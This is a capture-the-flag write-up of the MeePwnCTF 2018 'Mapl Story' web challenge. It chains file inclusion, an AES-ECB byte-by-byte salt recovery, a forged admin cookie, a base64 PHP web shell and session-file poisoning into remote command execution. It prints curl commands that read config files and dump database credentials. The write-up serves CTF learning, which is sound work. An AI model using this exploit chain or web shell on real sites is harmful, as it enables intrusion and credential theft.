Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a “character” and train a pet a command. You get the code but the config is censored.

Have a look around

First of let’s create an account, e.g., set any name, we’ll change that later.

Sign in and have a look at your cookies, you’ll see your PHPSESSID and a _role. _role is generated using either sha256("admin".$salt) or (in this case) sha256("user".$salt). We need the salt to continue here.

Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

File inclusion vulnerability

There is a file inclusion vulnerability in index.php, so have a look at e.g. /index.php?page=/etc/group. Unfortunately it uses a GET variable which is heavily escaped so for now there isn’t really much we can directly do with this bug.

Let’s get salty

Let’s have a look at /index.php?page=/var/lib/php/sessions/sess_PHPSESSID (replace PHPSESSID).

You’ll see a variable called character_name. character_name is AES-128-ECB encrypted data using openssl_encrypt($data.$salt,"AES-128-ECB",$key). Since AES-128-ECB is working on 16-byte blocks and we control the start of the string (it’s the character name you can update on your settings page!) we can attack it by brute-forcing byte by byte.

We start of setting a character name like AAAAAAAAAAAAAAA (15x’A’) and we’ll look at the first 32 characters of the hash in the session file, now we start trying printable characters at the 16. position, we’ll find a hash match at AAAAAAAAAAAAAAAm so we now the salt starts with m. Next we do the same thing with AAAAAAAAAAAAAA (14x’A’) and will get the hash and try characters again, the next match will be AAAAAAAAAAAAAAms.

We’ll continue this until we finally get the salt: ms_g00d_0ld_g4m3.

Becoming admin

Becoming admin now is as simple as writing the result of sha256("admin"."ms_g00d_0ld_g4m3") into our _role cookie. After refreshing the page you’ll see the admin link appearing in the navigation bar.

sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054

Give yourself a pet

In the admin menu you have to give yourself a pet. This will allow you to train it commands on the character page, which is just writing a text-file under "uploads/".md5($salt.$email)."/command.txt. A lot of characters are filtered and you can only write 19 characters, so you can’t really do much with this alone.

19 characters is just barely long enough to fit a base64-encoded <?=`$_GET[1]`; (PD89YCRfR0VUWzFdYDs – slightly broken padding), which would give us a shell, but now we need a way to actually decode and execute that…

Choose a new name

Well, if you looked carefully at the session file you would have noticed the clear-text action part, which contains the last logged line. There is one log-line in the code-base which we can control, when giving a player a pet the log will contain the character name at the end.

I think <?=include"$_COOKIE[0] is a beautiful name, don’t you think? So what does this do?… It allows us to include files using a cookie named 0. Since cookies are not filtered inside the script we now have full control over the file inclusion.

Execute your first command

Now that everything is prepared we need a final way to execute the base64-encoded php code we trained our pet earlier, but that’s really simple, PHP actually has a built-in helper for that: php://filter/convert.base64-decode/resource=path/to/file.

In case of (considering the upload path mentioned before) a command-execution now looks like this:

Ξ ~ → curl 'http://mapl.story/?page=/var/lib/php/sessions/sess_0qlekg08c8pah3rcftjraeon24&1=ls' -H 'Cookie: 0=php://filter/convert.base64-decode/resource=upload/56cea464131b6903185abfe3d6103385/command.txt'      
character_name|s:96:"d1f197d11ed6b3d29f08a9893429eb2bfa19e4543ff1d33bf19c5a89aec19b45080a355c37b4654ec2a5813f81dbe98b";user|s:96:"917467323f3a8e09ab1c2a2d7e3dc3ac85c0c4f08622b7e10a4ec4a18ad36e9919326131b516d9053ee8980a1230ad0e";action|s:65:"[02:27:52am GMT+7] gave blackpig to player admin.php


From there we can take a look at dbconnect.php (&1=cat%20dbconnect.php) and we’ll find the mysql username and password:

define('DBUSER', 'mapl_story_user');
define('DBPASS', 'tsu_tsu_tsu_tsu'); 
define('DBNAME', 'mapl_story');

Now let’s see what’s in the mapl_config table that is mentioned a few times in the script (it should at least contain the encryption key):

curl 'http://mapl.story/?page=/var/lib/php/sessions/sess_0qlekg08c8pah3rcftjraeon24&1=echo%20%27SELECT%20%2A%20FROM%20mapl_config%3B%27|%20mysql%20-umapl_story_user%20-ptsu_tsu_tsu_tsu%20mapl_story' -H 'Cookie: 0=php://filter/convert.base64-decode/resource=upload/56cea464131b6903185abfe3d6103385/command.txt' 
character_name|s:96:"d1f197d11ed6b3d29f08a9893429eb2bfa19e4543ff1d33bf19c5a89aec19b45080a355c37b4654ec2a5813f81dbe98b";user|s:96:"917467323f3a8e09ab1c2a2d7e3dc3ac85c0c4f08622b7e10a4ec4a18ad36e9919326131b516d9053ee8980a1230ad0e";action|s:65:"[02:27:52am GMT+7] gave blackpig to player mapl_salt	mapl_key	mapl_now_get_your_flag
ms_g00d_0ld_g4m3	You_Never_Guess_This_Tsug0d_1337	MeePwnCTF{__Abus1ng_SessioN_Is_AlwAys_C00L_1337!___}

There we go, we got our flag MeePwnCTF{__Abus1ng_SessioN_Is_AlwAys_C00L_1337!___} :)